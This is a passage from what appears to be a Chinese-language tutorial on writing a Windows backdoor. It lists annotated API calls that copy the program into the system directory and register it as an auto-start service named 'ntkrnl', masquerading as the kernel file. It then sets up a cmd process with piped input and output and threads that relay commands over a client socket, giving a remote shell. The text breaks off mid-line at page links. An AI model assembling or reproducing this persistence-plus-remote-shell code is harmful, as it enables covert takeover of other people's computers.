GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
//获得当前进程的程序文件名;
CopyFile(lpCurrentPath,lpImagePath,FALSE);
//复制文件到系统目录下;
schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
//打开服务控制管理器数据库;
CreateService(schSCManager,"ntkrnl","ntkrnl",
SERVICE_ALL_ACCESS,SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
"ntkrnl.exe",NULL,NULL,NULL,NULL,NULL);
//创建服务,参数包括名称,服务类型,开始类型,错误类型及文件路径等;
schService=OpenService(schSCManager,"ntkrnl",SERVICE_START);
//如果服务已经创建,则打开服务;
StartService(schService,0,NULL);
//启动服务进程;
ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus);
//控制服务状态;
DeleteService(schService);
//卸载服务程序;
DeleteFile(lpImagePath);
//删除文件;
3.后门程序相关函数
hMutex=CreateMutex(NULL,FALSE,NULL);
//创建互斥量;
hThread=CreateThread(NULL,0,CmdShell,(LPVOID)&sClient,0,NULL);
//创建处理客户端访问的重定向输入输出线程;
CreatePipe(&hReadPipe,&hReadShell,&saPipe,0);
CreatePipe(&hWriteShell,&hWritePipe,&saPipe,0);
//创建用于进程间通信的输入/输出管道;
CreateProcess(lpImagePath,NULL,NULL,NULL,TRUE,0,NULL,NULL,&lpStartupInfo,&lpProcessInfo);
//创建经重定向输入输出的Cmd进程;
hThread[1]=CreateThread(NULL,0,ReadShell,(LPVOID*)&sdRead,0,&dwSendThreadId);
hThread[2]=CreateThread(NULL,0,WriteShell,(LPVOID *)&sdWrite,0,&dwReavThreadId);
//创建处理Cmd输入输出的线程;
dwResult=WaitForMultipleObjects(3,hThread,FALSE,INFINITE);
//等待线程或进程的结束;
ReleaseMutex(hMutex);
//释放互斥量;
PeekNamedPipe(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL,NULL);
//从管道中复制数据到缓冲区中,但不从管道中移出;
ReadFile(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL);
//从管道中复制数据到缓冲区中;
WriteFile(sdWrite.hPipe,s 上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] ... 下一页 >> |
